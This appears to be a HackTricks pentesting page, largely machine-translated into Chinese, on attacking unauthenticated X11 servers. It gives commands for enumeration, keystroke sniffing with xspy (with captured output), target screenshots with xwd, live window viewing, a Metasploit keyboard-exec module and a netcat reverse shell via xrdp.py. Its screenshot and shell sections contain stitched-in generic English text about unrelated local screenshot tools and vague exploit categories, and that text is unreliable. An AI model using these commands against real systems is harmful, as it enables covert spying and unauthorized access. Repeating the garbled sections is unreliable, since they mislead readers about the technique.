12 KiB
6000 - X11渗透测试
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?想要在HackTricks中看到你的公司广告吗?或者你想要获取PEASS的最新版本或下载HackTricks的PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品——The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组 或 Telegram群组 或 关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
HackenProof是所有加密漏洞赏金的家园。
无需等待即可获得奖励
HackenProof的赏金只有在客户存入奖励预算后才会启动。在漏洞验证后,您将获得奖励。
在web3渗透测试中积累经验
区块链协议和智能合约是新的互联网!在其兴起的时代掌握web3安全。
成为web3黑客传奇
每次验证的漏洞都会获得声望积分,并占据每周排行榜的榜首。
在HackenProof上注册开始从您的黑客攻击中获利!
{% embed url="https://hackenproof.com/register" %}
基本信息
X Window System(也称为X)是一种用于位图显示的窗口系统,常见于基于UNIX的操作系统。X为基于GUI的环境提供了基本框架。X也不强制要求用户界面 - 这由各个程序处理。
来源:https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref
**默认端口:**6000
PORT STATE SERVICE
6000/tcp open X11
枚举
检查匿名连接:
nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11
本地枚举
用户主目录中的文件**.Xauthority
被X11用于授权**。来自这里:
MIT-magic-cookie-1:生成128位的密钥(“cookie”),将其存储在~/.Xauthority(或XAUTHORITY环境变量指向的位置)。客户端以明文形式将其发送到服务器!服务器检查是否有此“cookie”的副本,如果有,则允许连接。密钥由DMX生成。
{% hint style="warning" %}
为了使用cookie,您应该设置环境变量:export XAUTHORITY=/path/to/.Xauthority
{% endhint %}
验证连接
xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
键盘记录
使用xspy来嗅探键盘按键。
示例输出:
xspy 10.9.xx.xx
opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
截图捕获
To capture screenshots during a penetration test, you can use various tools and techniques. Here are some common methods:
1. Scrot
Scrot is a command-line tool that allows you to capture screenshots in Linux. You can install it using the following command:
sudo apt-get install scrot
To capture a screenshot, simply run the following command:
scrot screenshot.png
This will save the screenshot as screenshot.png
in the current directory.
2. Shutter
Shutter is a feature-rich screenshot tool for Linux. You can install it using the following command:
sudo apt-get install shutter
Once installed, you can launch Shutter from the applications menu. It provides a graphical interface to capture screenshots and offers various editing options.
3. Flameshot
Flameshot is another popular screenshot tool for Linux. You can install it using the following command:
sudo apt-get install flameshot
To capture a screenshot, run the following command:
flameshot gui
This will open the Flameshot interface, allowing you to capture and edit screenshots.
4. Snipping Tool (Windows)
If you are using Windows, you can use the built-in Snipping Tool to capture screenshots. Simply search for "Snipping Tool" in the Start menu and launch the application. It provides a user-friendly interface to capture screenshots.
5. Snip & Sketch (Windows 10)
For Windows 10 users, Snip & Sketch is a built-in screenshot tool. You can search for "Snip & Sketch" in the Start menu and launch the application. It offers various screenshot capture options and editing features.
Remember to use these tools responsibly and only capture screenshots within the scope of your penetration test.
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png
远程桌面查看
来源:https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref
./xrdp.py <IP:0>
从:https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
首先,我们需要使用xwininfo找到窗口的ID。
xwininfo -root -display 10.9.xx.xx:0
xwininfo: Window id: 0x45 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1024x768+0+0
XWatchwin
对于实时查看,我们需要使用
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
获取Shell
To get a shell on a target system, you can exploit vulnerabilities in the X11 server or use X11 forwarding.
Exploiting X11 Server Vulnerabilities
-
X11 Server Misconfiguration: Check if the X11 server is misconfigured and allows connections from unauthorized hosts. If so, you can connect to the X11 server and execute commands.
-
X11 Server Buffer Overflow: Exploit buffer overflow vulnerabilities in the X11 server to execute arbitrary code and gain a shell.
-
X11 Server Authentication Bypass: Exploit authentication bypass vulnerabilities in the X11 server to gain unauthorized access and execute commands.
Using X11 Forwarding
-
SSH X11 Forwarding: If the target system has SSH enabled with X11 forwarding, you can use the
-X
or-Y
option to enable X11 forwarding and run graphical applications remotely. -
X11 Forwarding over Netcat: Use Netcat to forward X11 traffic between the target system and your machine. This allows you to run X11 applications on the target system and interact with them remotely.
-
X11 Forwarding over SSH Tunnel: Set up an SSH tunnel to forward X11 traffic between the target system and your machine. This allows you to securely run X11 applications on the target system and interact with them remotely.
Remember to always obtain proper authorization before attempting to gain shell access on a target system. Unauthorized access is illegal and unethical.
msf> use exploit/unix/x11/x11_keyboard_exec
另一种方法:
反向Shell: Xrdp还允许通过Netcat获取反向Shell。输入以下命令:
./xrdp.py <IP:0> –no-disp
它将提示一个新的控制面板,在这里我们可以看到R-shell选项,如下所示:
我们将在本地系统上的端口5555上启动Netcat监听模式,如下所示:
然后添加IP和端口,然后选择R-Shell,如下所示:
现在,如下所示,我们已经完全访问了系统:
{% embed url="https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref" %}
Shodan
port:6000 x11
HackenProof是所有加密漏洞赏金的家园。
即时获得奖励
HackenProof的赏金只有在客户存入奖励预算后才会启动。在漏洞经过验证后,您将获得奖励。
在web3渗透测试中积累经验
区块链协议和智能合约是新的互联网!在其崛起之时掌握web3安全。
成为web3黑客传奇
每次验证的漏洞都会获得声望积分,并占据每周排行榜的榜首。
在HackenProof上注册 开始从您的黑客攻击中获利!
{% embed url="https://hackenproof.com/register" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗?您想在HackTricks中看到您的公司广告吗?或者您想获得最新版本的PEASS或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFT收藏品The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组,或在Twitter上关注我🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享您的黑客技巧。